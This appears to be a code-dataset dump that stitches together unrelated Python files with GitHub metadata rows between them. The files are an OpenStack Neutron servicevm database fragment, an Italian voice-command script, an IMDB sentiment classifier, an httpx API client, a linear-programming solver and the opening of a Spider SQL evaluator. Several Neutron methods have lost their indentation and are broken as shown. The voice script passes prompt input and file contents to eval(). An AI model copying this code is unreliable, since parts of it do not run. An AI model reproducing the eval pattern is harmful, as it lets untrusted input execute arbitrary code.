        if fip_rate.RATE_LIMIT in fip:
            floatingip_db[fip_rate.RATE_LIMIT] = fip[fip_rate.RATE_LIMIT]
def get_device_services(self, context, service_ids):
service_lists = []
with context.session.begin(subtransactions=True):
instance_db = (self._model_query(context, ServiceInstance).
filter(ServiceInstance.id.in_(service_ids))).all()
for instance in instance_db:
device_db = (
self._model_query(context, Device).
filter(sa.exists().where(sa.and_(
ServiceDeviceBinding.device_id == Device.id,
ServiceDeviceBinding.service_instance_id ==
instance.id))).one())
service = self._make_service_instance_dict(instance)
service['device_dict'] = self._make_device_dict(device_db)
service_lists.append(service)
return service_lists
    def _get_sync_vfirewall_data(self, context,
                                 svc_ids=None, active=None):
        """Placeholder: vfirewall sync data is not implemented yet."""
        pass
    def _get_sync_vrouter_data(self, context,
                               svc_ids=None, active=None):
        """Build the vrouter sync payload: services plus their ports and fips."""
        service_lists = self.get_device_services(context,
                                                 svc_ids)
        routers = self._get_router_info_list(context,
                                             service_lists,
                                             active=active)
        return routers
    def sync_service_instance_ids(self, context, host,
                                  device_ids=None):
        """Return ids of service instances served by the agent on *host*.

        Returns [] when the agent is administratively down or not reserved.
        """
        plugin = manager.NeutronManager.get_plugin()
        agent = plugin._get_agent_by_type_and_host(
            context, n_constants.AGENT_TYPE_SERVICEVM, host)
        if not agent.admin_state_up or not agent.reserved:
            return []
        query = context.session.query(ServiceInstance)
        query = query.join(ServiceDeviceBinding)
        # NOTE(review): this join condition only tests the agent id and does
        # not relate DeviceAgentBinding.device_id to
        # ServiceDeviceBinding.device_id -- confirm the intended join.
        query = query.join(DeviceAgentBinding,
                           DeviceAgentBinding.servicevm_agent_id==agent.id)
        if device_ids:
            if len(device_ids) == 1:
                # Single-id fast path avoids an IN clause.
                query = query.filter(
                    ServiceDeviceBinding.device_id ==
                    device_ids[0])
            else:
                query = query.filter(
                    ServiceDeviceBinding.device_id.in_(
                        device_ids))
        svc_ids = [item['id'] for item in query]
        LOG.debug('agent get service ids %(svc_ids)s', {'svc_ids':svc_ids})
        return svc_ids
def sync_service_instances(self, context, host,
service_instances_ids=None,
device_ids=None):
plugin = manager.NeutronManager.get_plugin()
agent = plugin._get_agent_by_type_and_host(
context, n_constants.AGENT_TYPE_SERVICEVM, host)
if not agent.admin_state_up or not agent.reserved:
return []
query = context.session.query(ServiceInstance)
query = query.join(ServiceDeviceBinding)
query = query.join(DeviceAgentBinding,
DeviceAgentBinding.servicevm_agent_id==agent.id)
if service_instances_ids:
if len(service_instances_ids) == 1:
query = query.filter(
ServiceDeviceBinding.service_instance_id ==
service_instances_ids[0])
else:
query = query.filter(
ServiceDeviceBinding.service_instance_id.in_(
service_instances_ids))
if device_ids:
if len(device_ids) == 1:
query = query.filter(
ServiceDeviceBinding.device_id ==
device_ids[0])
else:
query = query.filter(
ServiceDeviceBinding.device_id.in_(
device_ids))
service_data = []
svc_ids = []
for service_type in s_constants.SURRPORT_SERVICE_TYPE:
query = query.filter(
ServiceInstance.servicetype==service_type)
svc_ids = [item['id'] for item in query]
if not svc_ids:
LOG.warn('service instance of service type %s is null', service_type)
continue
data = getattr(self, self.service_type_sync_func[service_type])(context, svc_ids)
if data:
service_data.extend(data)
LOG.debug('agent get service data %(service_data)s', {'service_data':service_data})
return service_data
    # hxn add for servicevm
    def get_sync_svm_ports(self, context, service_ids,
                           service_type, active=None):
        """Fetch ports of *service_type* owned by the given service instances.

        Subnet details are populated in place when any ports are found.
        """
        filters = {'service_instance_id': service_ids,
                   'servicevm_type': [service_type] }
        ports = self._core_plugin.get_ports(context, filters)
        if ports:
            self.l3_plugin._populate_subnet_for_ports(context, ports)
        return ports
    def get_sync_svm_device_ports(self, context, device_ids,
                                  service_type, active=None):
        """Fetch ports of *service_type* owned by the given devices.

        Subnet details are populated in place when any ports are found.
        """
        filters = {'servicevm_device': device_ids,
                   'servicevm_type': [service_type] }
        ports = self._core_plugin.get_ports(context, filters)
        if ports:
            self.l3_plugin._populate_subnet_for_ports(context, ports)
        return ports
def _build_services_list(self, context, service_lists, gw_ports):
for s in service_lists:
service_id = s['id']
# Collect gw ports only if available
if service_id and gw_ports.get(service_id):
s[n_constants.GW_INTERFACE_KEY] = gw_ports[service_id]
return service_lists
    def get_svm_gw_ports(self, context, service_lists, active=None):
        """Look up router-gateway ports per service and attach them."""
        service_ids = [s['id'] for s in service_lists]
        servicevm_type = n_constants.SERVICEVM_OWNER_ROUTER_GW
        # One gateway port per service instance.
        gw_ports = dict((gw_port['service_instance_id'], gw_port)
                        for gw_port in
                        self.get_sync_svm_ports(context, service_ids,
                                                servicevm_type, active=active))
        return self._build_services_list(context, service_lists, gw_ports)
    def get_svm_internal_ports(self, context, service_lists):
        """Attach router-interface ports to each service, keyed by device."""
        # only a service instance for each service type in a device
        service_dicts = dict((s['devices'][0], s) for s in service_lists)
        servicevm_type = n_constants.SERVICEVM_OWNER_ROUTER_INTF
        interfaces = self.get_sync_svm_device_ports(context, service_dicts.keys(),
                                                    servicevm_type)
        for interface in interfaces:
            service = service_dicts.get(interface['servicevm_device'])
            if service:
                internal_interfaces = service.get(n_constants.INTERFACE_KEY, [])
                internal_interfaces.append(interface)
                service[n_constants.INTERFACE_KEY] = internal_interfaces
        return service_lists
    def get_svm_mgmt_ports(self, context, service_lists):
        """Attach management ports to each service, keyed by device."""
        # only a service instance for each service type in a device
        service_dicts = dict((s['devices'][0], s) for s in service_lists)
        servicevm_type = n_constants.SERVICEVM_OWNER_MGMT
        interfaces = self.get_sync_svm_device_ports(context, service_dicts.keys(),
                                                    servicevm_type)
        for interface in interfaces:
            service = service_dicts.get(interface['servicevm_device'])
            if service:
                internal_interfaces = service.get(n_constants.MANAGERMENT_KEY, [])
                internal_interfaces.append(interface)
                service[n_constants.MANAGERMENT_KEY] = internal_interfaces
        return service_lists
    def get_device_details(self, rpc_context, **kwargs):
        """Agent requests device details.

        Returns a dict describing the port bound to *device*; when the
        device is unknown only {'device': device} is returned.
        """
        device = kwargs.get('device')
        host = kwargs.get('host')
        port = ovs_db_v2.get_port(device)
        if port:
            # NOTE(review): `binding` is unused because the fields below
            # were commented out after raising AttributeError -- confirm
            # whether the lookup itself is still needed.
            binding = ovs_db_v2.get_network_binding(None, port['network_id'])
            entry = {'device': device,
                     'network_id': port['network_id'],
                     'port_id': port['id'],
                     'admin_state_up': port['admin_state_up']}
            #cinghu raise attribut error
            #'network_type': binding.network_type,
            #'segmentation_id': binding.segmentation_id,
            #'physical_network': binding.physical_network}
        else:
            entry = {'device': device}
            LOG.debug(_("%s can not be found in database"), device)
        return entry
def get_devices_details_list(self, rpc_context, devices, host):
return [
self.get_device_details(
rpc_context,
device=device,
host=host
)
for device in devices
]
| CingHu/neutron-ustack | neutron/db/vm/vm_db.py | vm_db.py | py | 67,145 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "neutron.openstack.common.log.getLogger",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "neutron.openstack.common.log",
"line_number": 29,
"usage_type": "name"
},
{
"api_name": "neutron.plugins.common.constants.ACTIVE",
"line_number": 31,
"usage_t... |
10507224268 | #! /mnt/NewDiskSim/stefano/stefano/CondaInstallation/envs/Experiments/bin/python
import os
import subprocess
import sys
import speech_recognition as sr
import tensorflow as tf
from spellchecker import SpellChecker
import pyautogui
# from utilities_sm import *
# Definire la lista di comandi vocali predefiniti
def open_terminal():
    """Launch a new GNOME terminal window (fire-and-forget side effect)."""
    subprocess.run(["gnome-terminal"])
def play_music():
    """Open music.mp3 (relative to the current working directory) in Rhythmbox."""
    subprocess.run(["rhythmbox", "music.mp3"])
def open_website(url):
    """Open *url* in Firefox (fire-and-forget side effect)."""
    subprocess.run(["firefox", url])
# Registry of predefined voice commands as (spoken phrase, handler) pairs.
# NOTE(review): despite the original comment calling this a dictionary,
# it is a list of tuples; lookups below iterate it linearly.
commands = [ ("Apri terminale", open_terminal),
            ("riproduci musica", play_music),
            ("apri sito web", open_website)]
def correct_text(text):
    """Return the spell-checked correction of *text* (None when no guess)."""
    return SpellChecker().correction(text)
def use_google_speech_recognition(audio,r):
    """Recognize *audio* with Google Speech Recognition and act on the text.

    Recognized text is spell-corrected; the special phrase
    "aggiungi comando rapido" registers a new quick command, otherwise the
    raw recognized text is typed at the cursor and matching quick commands
    are executed.
    """
    recognized_text = ""
    # Handle the case where no text is recognized at all.
    try:
        recognized_text = r.recognize_google(audio,language="it-IT", show_all=False)
    except sr.UnknownValueError:
        print("Google Speech Recognition could not understand audio")
        return
    print("Google Speech Recognition thinks you said: " + recognized_text)
    corrected_text = correct_text(recognized_text)
    # Check if the corrected_text is a NoneType
    if corrected_text is None:
        print("Google Speech Recognition could not understand audio")
    else:
        print("Google Speech Recognition thinks you said: " + corrected_text)
        # Save the raw audio alongside the corrected transcription.
        with open("corrected_text.wav", "wb") as f:
            f.write(audio.get_wav_data())
        if corrected_text == "aggiungi comando rapido":
            new_command = input("What is the new quick command you want to add? ")
            new_function = input("What function should be executed when the command is triggered? ")
            # SECURITY: eval() on free-form user input executes arbitrary code.
            commands.append((new_command, eval(new_function)))
            with open("quick_commands.txt", "a") as f:
                f.write(f"{new_command},{new_function}\n")
        else:
            # Type the text at the current cursor position.
            # NOTE(review): this uses recognized_text, not corrected_text --
            # confirm which transcription should be typed/matched.
            pyautogui.typewrite(recognized_text)
            for command, function in commands:
                if recognized_text == command:
                    print(command, function)
                    function()
def use_deep_speech(audio, model):
    """Recognize *audio* with the loaded DeepSpeech model and act on the text.

    Mirrors use_google_speech_recognition: the phrase
    "aggiungi comando rapido" registers a quick command, otherwise the
    text is typed at the cursor and matching quick commands run.
    """
    audio_data = audio.get_wav_data()
    # NOTE(review): get_wav_data() returns bytes; feeding raw WAV bytes as a
    # float32 tensor looks suspect -- confirm the model's expected input.
    input_data = tf.constant(audio_data, dtype=tf.float32)
    input_data = tf.reshape(input_data, [1, -1, 1])
    prediction = model.predict(input_data)
    recognized_text = prediction.numpy()[0]
    print("DeepSpeech thinks you said: " + recognized_text)
    if recognized_text == "aggiungi comando rapido":
        new_command = input("What is the new quick command you want to add? ")
        new_function = input("What function should be executed when the command is triggered? ")
        # SECURITY: eval() on free-form user input executes arbitrary code.
        commands.append((new_command, eval(new_function)))
        with open("quick_commands.txt", "a") as f:
            f.write(f"{new_command},{new_function}\n")
    else:
        # Type the text at the current cursor position.
        pyautogui.typewrite(recognized_text)
        for command, function in commands:
            if recognized_text == command:
                function()
def inizialized():
    """Prompt for an engine choice and return a speech recognizer.

    FIX: the original only assigned ``r`` in the "g" branch, so choosing
    "d" or an invalid option raised UnboundLocalError at ``return r``.
    A Recognizer is now created up front so every branch returns one (the
    main loop below only supports the Google path anyway).
    """
    print("Start Inizialization")
    choice = input("Do you want to use Google Speech Recognition or DeepSpeech? (g/d): ")
    # Create the recognizer unconditionally so the function always returns one.
    r = sr.Recognizer()
    if choice == "g":
        # Energy threshold: how loud audio must be to count as speech.
        r.energy_threshold = 4000
    elif choice == "d":
        # Load the DeepSpeech model.
        # NOTE(review): the loaded model is never returned or used by the
        # caller -- the main loop only calls the Google recognizer path.
        tf.saved_model.load("deepspeech-0.6.1-models/deepspeech-0.6.1-models")
    else:
        print("Invalid choice")
    return r
# Load previously saved quick commands from quick_commands.txt.
# SECURITY: eval() on file content executes arbitrary code if the file is
# tampered with -- consider a whitelist of allowed handler names instead.
try:
    with open("quick_commands.txt", "r") as f:
        for line in f:
            command, function = line.strip().split(",")
            commands.append((command, eval(function)))
except FileNotFoundError:
    # Create an empty file in the current directory if it doesn't exist
    with open("quick_commands.txt", "w") as f:
        pass
    pass
# Entry point: pick an engine, then listen and recognize forever.
r = inizialized()
while True:
    # Capture one utterance from the microphone.
    with sr.Microphone() as source:
        print("Say something!")
        audio = r.listen(source)
    use_google_speech_recognition(audio,r=r)
| StefanoMuscat/SpeechRec | Main02.py | Main02.py | py | 4,590 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "subprocess.run",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "subprocess.run",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "subprocess.run",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "spellchecker.SpellChecke... |
73881391462 | import os
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.ensemble import RandomForestClassifier
import pandas as pd
import nltk
from KaggleWord2VecUtility import KaggleWord2VecUtilityClass
from textblob import TextBlob
# if __name__ == '__main__':
# [1] Read the labeled/unlabeled IMDB review data from ./data next to this file.
train = pd.read_csv(os.path.join(os.path.dirname(
    __file__), 'data', 'labeledTrainData.tsv'), header=0, delimiter="\t", quoting=3)
test = pd.read_csv(os.path.join(os.path.dirname(__file__),
                   'data', 'testData.tsv'), header=0, delimiter="\t", quoting=3)
# NOTE(review): unlabeled_train is loaded but never used below.
unlabeled_train = pd.read_csv(os.path.join(os.path.dirname(
    __file__), 'data', "unlabeledTrainData.tsv"), header=0, delimiter="\t", quoting=3)

print("The first review is:")
print(train["review"][0])
input("Press Enter to continue...")

# [2] Clean the training and test sets
# print("Download text data sets.")
# nltk.download() # Download text data sets, including stop words
clean_train_reviews = []
print("Cleaning and parsing the training set movie reviews...\n")
for i in range(0, len(train["review"])):
    clean_train_reviews.append(
        " ".join(KaggleWord2VecUtilityClass.review_to_wordlist(train["review"][i], True)))

# Bag-of-words features: counts of the 5000 most frequent words.
print("Creating the bag of words...\n")
vectorizer = CountVectorizer(analyzer="word", tokenizer=None,
                             preprocessor=None, stop_words=None, max_features=5000)
train_data_features = vectorizer.fit_transform(clean_train_reviews)
train_data_features = train_data_features.toarray()

print("Training the random forest (this may take a while)...")
forest = RandomForestClassifier(n_estimators=1000)
forest = forest.fit(train_data_features, train["sentiment"])

clean_test_reviews = []
print("Cleaning and parsing the test set movie reviews...\n")
for i in range(0, len(test["review"])):
    clean_test_reviews.append(
        " ".join(KaggleWord2VecUtilityClass.review_to_wordlist(test["review"][i], True)))
# Reuse the fitted vocabulary: transform only, never fit on test data.
test_data_features = vectorizer.transform(clean_test_reviews)
test_data_features = test_data_features.toarray()

print("Predicting test labels...\n")
result = forest.predict(test_data_features)
output = pd.DataFrame(data={"id": test["id"], "sentiment": result})
output.to_csv(os.path.join(os.path.dirname(__file__), 'data',
              'Bag_of_Words_model.csv'), index=False, quoting=3)
print("Wrote results to Bag_of_Words_model.csv")

# Textblob sentiment analysis to compare
predicted_sentiments = []
for review in clean_test_reviews:
    analysis = TextBlob(review)
    # TextBlob returns polarity in the range [-1, 1].
    # We'll classify reviews with polarity > 0 as positive (sentiment = 1)
    if analysis.sentiment.polarity > 0:
        predicted_sentiments.append(1)
    else:
        predicted_sentiments.append(0)

output = pd.DataFrame(
    data={"id": test["id"], "sentiment": predicted_sentiments})
output.to_csv(os.path.join(os.path.dirname(__file__), 'data',
              'TextBlob_Predictions.csv'), index=False, quoting=3)
print("Wrote results to TextBlob_Predictions.csv")

# The block below is disabled (kept as a no-op string literal by the author).
"""# [3] Evaluate the model
# 1. Load the CSV file into a DataFrame
df = pd.read_csv('Bag_of_Words_model.csv')
# 2. Extract the ratings from the `id` column
df['rating'] = df['id'].str.split('_').str[-1].astype(int)
# 3. Compute the predicted sentiment based on the extracted ratings
df['predicted_sentiment'] = df['rating'].apply(lambda x: 1 if x >= 5 else 0)
# 4. Compare the predicted sentiment with the actual sentiment to compute the accuracy
correct_predictions = (df['sentiment'] == df['predicted_sentiment']).sum()
total_predictions = len(df)
accuracy = correct_predictions / total_predictions * 100
print(f'Accuracy: {accuracy:.2f}%')"""
| Jacques-Ludik/SentimentAnalysis | main.py | main.py | py | 3,702 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.read_csv",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line... |
11369140618 | from http import HTTPStatus
from typing import Any
import httpx
from config import config
class UserClient:
    """HTTP client for the /api/v1/users/ endpoints."""

    def __init__(self, url: str):
        self.url = f'{url}/api/v1/users/'

    def _fetch_json(self, endpoint: str):
        # Shared GET helper: raise on HTTP errors, then decode the body.
        response = httpx.get(endpoint)
        response.raise_for_status()
        return response.json()

    def registrate(self, username: str, tgid: int):
        """Create a user; return False when it already exists (409)."""
        payload = {'username': username, 'tgid': tgid}
        response = httpx.post(self.url, json=payload)
        if response.status_code == HTTPStatus.CONFLICT:
            return False
        response.raise_for_status()
        return True

    def get_by_tgid(self, tgid: int):
        """Look a user up by Telegram id."""
        return self._fetch_json(f'{self.url}telegram/{tgid}')

    def get_products_by_user(self, user_id: int):
        """List the products tracked by the given user."""
        return self._fetch_json(f'{self.url}{user_id}/products/')
class CategoriesClient:
    """HTTP client for the /api/v1/categories/ endpoints."""

    def __init__(self, url: str):
        self.url = f'{url}/api/v1/categories/'

    def _fetch_json(self, endpoint: str, params=None) -> list[dict[str, Any]]:
        # Shared GET helper: raise on HTTP errors, then decode the body.
        response = httpx.get(endpoint, params=params)
        response.raise_for_status()
        return response.json()

    def get_categories(self) -> list[dict[str, Any]]:
        """All categories."""
        return self._fetch_json(self.url)

    def get_categories_by_name(self, name: str) -> list[dict[str, Any]]:
        """Categories whose title matches *name*."""
        return self._fetch_json(self.url, params={'title': name})

    def get_products(self, category_id: int) -> list[dict[str, Any]]:
        """Products belonging to one category."""
        return self._fetch_json(f'{self.url}{category_id}/products/')
class ProductsClient:
    """HTTP client for the /api/v1/products/ endpoints."""

    def __init__(self, url: str):
        self.url = f'{url}/api/v1/products/'

    def add(self, category_id: int, title: str, user_id: int) -> dict[str, Any]:
        """Create a product for a user inside a category."""
        body = {
            'category_id': category_id,
            'title': title,
            'user_id': user_id,
        }
        response = httpx.post(self.url, json=body)
        response.raise_for_status()
        return response.json()
class ChoosesClient:
    """HTTP client for the /api/v1/chooses/ endpoints."""

    def __init__(self, url: str):
        self.url = f'{url}/api/v1/chooses/'

    def choose_products(self, source_product_id: int, target_product_id: int) -> dict[str, Any]:
        """Record a choice between two products."""
        body = {
            'source_product_id': source_product_id,
            'target_product_id': target_product_id,
        }
        response = httpx.post(self.url, json=body)
        response.raise_for_status()
        return response.json()
class ApiClient:
    """Facade bundling the per-resource clients behind one entry point."""

    def __init__(self, url: str):
        self.users = UserClient(url=url)
        self.categories = CategoriesClient(url=url)
        self.products = ProductsClient(url=url)
        self.chooses = ChoosesClient(url=url)
api = ApiClient(url=config.http_key)
| learn-python-sfnl/tgbot | tgbot/api.py | api.py | py | 2,675 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "httpx.post",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "http.HTTPStatus.CONFLICT",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "http.HTTPStatus",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "httpx.get",
... |
72673672743 | from itertools import combinations
import numpy as np
import copy
def converse_to_canonical(var_num, non_neg_rest_num, non_pos_rest_num, eq_rest_num, positive_indexes, func_coefs,
                          rest_coefs, rest_b):
    """Convert a general LP problem into canonical form (equalities only,
    all variables non-negative).

    Constraint rows are assumed ordered as: ">=" rows first, then "<=" rows,
    then equalities — presumably; confirm against the callers.

    :return: (new_matrix, transform_matrix, new_rest_b, new_func_coefs) where
        transform_matrix maps a canonical-space vector back to the original
        variables.
    """
    #############################
    # initial validation (left as a reminder in the original):
    # - check the number of variables
    # - check that the matrix is non-empty
    # - check the right-hand-side vector matches the matrix
    #############################
    start_vars_count = var_num
    new_rest_coefs = copy.deepcopy(rest_coefs)
    new_rest_b = rest_b.copy()
    new_func_coefs = func_coefs.copy()
    # flip ">=" rows into "<=" rows by negating coefficients and the RHS
    for i in range(non_neg_rest_num):
        for j in range(len(new_rest_coefs[i])):
            new_rest_coefs[i][j] *= -1
        new_rest_b[i] *= -1
    # number of slack variables added when turning inequalities into equalities
    new_neq_vars_count = non_neg_rest_num + non_pos_rest_num
    for i in range(new_neq_vars_count):
        new_func_coefs.append(0)
    new_matrix = np.matrix(new_rest_coefs)
    # append an identity block (slack variables) to the right of the inequality
    # rows; equality rows get a zero block
    right_matrix = np.eye(new_neq_vars_count)
    if eq_rest_num > 0:
        right_matrix = np.vstack((right_matrix, np.zeros((eq_rest_num, new_neq_vars_count))))
    new_matrix = np.hstack((new_matrix, right_matrix))
    # substitute sign-unrestricted variables
    transform_matrix = []
    additional_matrix = []
    columns_deleted = 0
    for i in range(start_vars_count):
        if i in positive_indexes:
            new_column = np.zeros(start_vars_count)
            new_column[i] = 1
            transform_matrix.append(new_column.tolist())
        else:
            # replace a sign-unrestricted variable by the difference of two
            # new non-negative variables (x = x+ - x-)
            new_vars = np.zeros((new_matrix.shape[0], 2))
            for j in range(new_matrix.shape[0]):
                new_vars[j][0] = new_matrix.item((j, i - columns_deleted))
                new_vars[j][1] = -new_matrix.item((j, i - columns_deleted))
            new_matrix = np.delete(new_matrix, i - columns_deleted, 1)
            new_matrix = np.hstack((new_matrix, new_vars))
            new_func_coefs.append(new_func_coefs[i - columns_deleted])
            new_func_coefs.append(-new_func_coefs[i - columns_deleted])
            new_func_coefs.pop(i - columns_deleted)
            columns_deleted += 1
            # build the columns of the inverse-transform matrix
            new_column = np.zeros(start_vars_count)
            new_column[i] = 1
            additional_matrix.append(new_column.tolist())
            new_column[i] = -1
            additional_matrix.append(new_column.tolist())
    # slack variables do not map back to any original variable
    for i in range(new_neq_vars_count):
        transform_matrix.append(np.zeros(start_vars_count).tolist())
    for i in additional_matrix:
        transform_matrix.append(i)
    transform_matrix = np.matrix(transform_matrix).transpose()
    return new_matrix, transform_matrix, new_rest_b, new_func_coefs
def find_all_matrices(A, M, N):
    """Enumerate all non-singular M x M column submatrices of A.

    :param A: constraint matrix in canonical form
    :param M: number of rows of A
    :param N: number of columns of A
    :return: (matrices, indexes) — each matrix is built from the columns of A
        listed, in the same order, in the corresponding index tuple
    """
    full = np.matrix(A)
    matrices = []
    indexes = []
    for cols in combinations(range(N), M):
        candidate = full[:, cols]
        # keep only (numerically) non-singular bases
        if abs(np.linalg.det(candidate)) > 1e-7:
            matrices.append(candidate)
            indexes.append(cols)
    return matrices, indexes
def find_all_vectors(A, b, M, N):
    """Find every basic feasible (support) vector of the canonical system A x = b.

    :param A: canonical-form constraint matrix
    :param b: canonical-form right-hand side
    :param M: number of rows of A
    :param N: number of columns of A
    :return: list of support vectors (empty when M >= N)
    """
    if M >= N:
        return []
    vectors = []
    matrices, indexes = find_all_matrices(A, M, N)
    for basis, cols in zip(matrices, indexes):
        solution = np.linalg.solve(basis, b)
        solution[abs(solution) < 1e-15] = 0
        # discard infeasible (negative) or numerically blown-up solutions
        if len(solution[solution < 0]) != 0:
            continue
        if len(solution[solution > 1e+15]) != 0:
            continue
        vector = [0] * N
        for pos, col in enumerate(cols):
            vector[col] = solution[pos]
        vectors.append(vector)
    return vectors
def EnumMethod(A, b, c, M, N, transform, max=False):
    """Extreme-point (support vector) enumeration method for linear programming.

    :param M: number of constraints
    :param N: number of variables
    :param A: constraint coefficient matrix (canonical form)
    :param b: right-hand-side vector of the constraints
    :param c: objective coefficient vector.
        NOTE(review): when max=True the entries of *c* are negated IN PLACE,
        mutating the caller's list — confirm callers do not reuse it.
    :param transform: matrix mapping canonical-space vectors back to the
        original problem (used only for the 'EnumMethod.txt' log)
    :param max: True to solve a maximization problem instead of a minimization
    :return: the optimal vector mapped back to the original variables; [] when
        the feasible region has no support vectors
    """
    mult = -1 if max else 1
    if max:
        for i in range(len(c)):
            c[i] *= mult
    f = open('EnumMethod.txt', 'w')
    vectors = find_all_vectors(A, b, M, N)
    if len(vectors) == 0:
        # NOTE(review): this early return leaves 'EnumMethod.txt' open.
        return []
    best_vector = vectors[0]
    # 'min' shadows the builtin; it holds the best objective value seen so far
    min = np.dot(best_vector, c)
    i = 1
    min_i = 1
    for tmp in vectors:
        current_val = np.dot(tmp, c)
        f.write("step " + str(i) + ":\n")
        f.writelines(map(lambda x: str(x) + ' ', np.dot(transform, np.matrix(tmp).transpose()).transpose().tolist()[0]))
        f.write("\nf(X_" + str(i) + ") =" + str(current_val) + '\n')
        if current_val < min:
            min = current_val
            best_vector = tmp
            min_i = i
        i += 1
    f.write("\nbest vector on step " + str(min_i) + ":\n")
    f.writelines(
        map(lambda x: str(x) + ' ', np.dot(transform, np.matrix(best_vector).transpose()).transpose().tolist()[0]))
    f.write("\n\nsolution:")
    f.writelines(map(lambda y: str(y) + ' ', np.dot(transform, best_vector)))
    f.write("\nf(X) = " + str(np.dot(c, best_vector)))
    f.close()
    # NOTE(review): multiplying the returned *vector* by mult negates the
    # solution itself for max=True (normally only the objective value is
    # negated back) — confirm this is intended.
    return (np.array(np.dot(transform, best_vector)) * mult).tolist()
def print_canon_task_human_readable(A, c, b):
    """Pretty-print a canonical LP problem (objective plus equality rows).

    :param A: constraint matrix
    :param c: objective coefficient vector
    :param b: constraint right-hand-side vector
    """
    mat = np.matrix(A)
    obj = np.matrix(c)
    rhs = np.matrix(b)
    pieces = ["f(X) = "]
    for j in range(obj.shape[1]):
        coef = obj.item(j)
        if abs(coef) > 1e-13:
            # the sign prefix is omitted for position 0, matching the layout
            if j != 0:
                pieces.append("+ " if coef > 0 else "- ")
            pieces.append(str(abs(coef)) + "x_" + str(j + 1) + ' ')
    pieces.append("-> min\n")
    for row in range(mat.shape[0]):
        for col in range(mat.shape[1]):
            coef = mat.item(row, col)
            if abs(coef) > 1e-13:
                if col != 0:
                    pieces.append("+ " if coef > 0 else "- ")
                pieces.append(str(abs(coef)) + "x_" + str(col + 1) + ' ')
        pieces.append("= " + str(rhs.item(row)) + '\n')
    print(''.join(pieces))
def convertToDual(var_num, non_neg_rest_num, non_pos_rest_num, eq_rest_num, positive_indexes, func_coefs,
                  rest_coefs, rest_b):
    """Build the dual LP problem from the primal description.

    Returns the dual in the same parameter layout as the input:
    (var_num, non_neg_rest_num, non_pos_rest_num, eq_rest_num,
     positive_indexes, func_coefs, rest_coefs, rest_b).
    """
    # 1: dual objective coefficients are the primal right-hand side
    new_func_coefs = rest_b
    # 2: dual right-hand side is the primal objective
    new_rest_b = func_coefs
    # 3: one dual variable per primal constraint
    new_var_num = non_neg_rest_num + non_pos_rest_num + eq_rest_num
    new_non_neg_rest_num = 0
    new_non_pos_rest_num = 0
    new_eq_rest_num = 0
    A = []
    new_positive_indexes = []
    for i in range(non_neg_rest_num + non_pos_rest_num):
        new_positive_indexes.append(i)
        # "<=" rows are negated — presumably to bring all inequality rows to a
        # common orientation; confirm against the callers.
        if i >= non_neg_rest_num:
            row = (-np.array(rest_coefs[i])).tolist()
        else:
            row = (np.array(rest_coefs[i])).tolist()
        A.append(row)
    # unused in the original; kept as-is
    positive_indexes_count = len(new_positive_indexes)
    for i in range(eq_rest_num):
        A.append(rest_coefs[i + non_neg_rest_num + non_pos_rest_num])
    # the dual constraint matrix is the transpose of the re-oriented primal matrix
    A = np.matrix(A).transpose().tolist()
    new_rest_coefs = []
    buf = []
    for i in range(len(A)):
        if i in positive_indexes:
            # rows derived from sign-restricted primal variables come first
            new_rest_coefs.append(A[i])
            # NOTE(review): this increments the *non_pos* counter here while the
            # *non_neg* counter stays 0 — the naming looks swapped relative to
            # converse_to_canonical; confirm against callers.
            new_non_pos_rest_num += 1
        else:
            buf.append(A[i])
            new_eq_rest_num += 1
    for i in buf:
        new_rest_coefs.append(i)
    return new_var_num, new_non_neg_rest_num, new_non_pos_rest_num, new_eq_rest_num, new_positive_indexes, new_func_coefs, new_rest_coefs, new_rest_b
| Hembos/optimization-method | linear_programming/EnumerationSimplexMethod.py | EnumerationSimplexMethod.py | py | 10,391 | python | ru | code | 0 | github-code | 36 | [
{
"api_name": "copy.deepcopy",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "numpy.matrix",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "numpy.eye",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "numpy.vstack",
"line_number"... |
2265981494 | import os
import json
import sqlite3
import argparse
import logging
import pickle
from copy import deepcopy
import difflib
import traceback
from semparser.common import registry
from semparser.common.utils import print_dict
from semparser.modules.semantic_parser.preprocessor.process_spider_sql import get_sql, get_schema
from semparser.modules.semantic_parser.asdl.spider.spider_hypothesis import SpiderDecodeHypothesis
from semparser.modules.semantic_parser.inference.spider_ast import SpiderAST
# Flag to disable value evaluation (literal comparison values are stripped when True)
DISABLE_VALUE = True
# Flag to disable distinct in select evaluation
DISABLE_DISTINCT = True
# SQL vocabulary used by the parsed-SQL structures: the index of an entry in
# these tuples is the integer id stored in condition / value / agg units.
CLAUSE_KEYWORDS = ('select', 'from', 'where', 'group', 'order',
                   'limit', 'intersect', 'union', 'except')
JOIN_KEYWORDS = ('join', 'on', 'as')
WHERE_OPS = ('not', 'between', '=', '>', '<', '>=', '<=', '!=', 'in', 'like', 'is', 'exists')
UNIT_OPS = ('none', '-', '+', "*", '/')
AGG_OPS = ('none', 'max', 'min', 'count', 'sum', 'avg')
TABLE_TYPE = {
    'sql': "sql",
    'table_unit': "table_unit",
}
COND_OPS = ('and', 'or')
SQL_OPS = ('intersect', 'union', 'except')
ORDER_OPS = ('desc', 'asc')
# Keyword groups used when scoring query hardness (easy/medium/hard/extra)
HARDNESS = {
    "component1": ('where', 'group', 'order', 'limit', 'join', 'or', 'like'),
    "component2": ('except', 'union', 'intersect')
}
class Schema:
    """Wraps a {table: [columns]} schema mapping and derives the id map used
    by the SQL parser ('table' / 'table.column' -> '__name__' token).
    """

    def __init__(self, schema):
        self._schema = schema
        self._idMap = self._map(self._schema)

    @property
    def schema(self):
        """The raw {table_name: [column_name, ...]} mapping."""
        return self._schema

    @property
    def idMap(self):
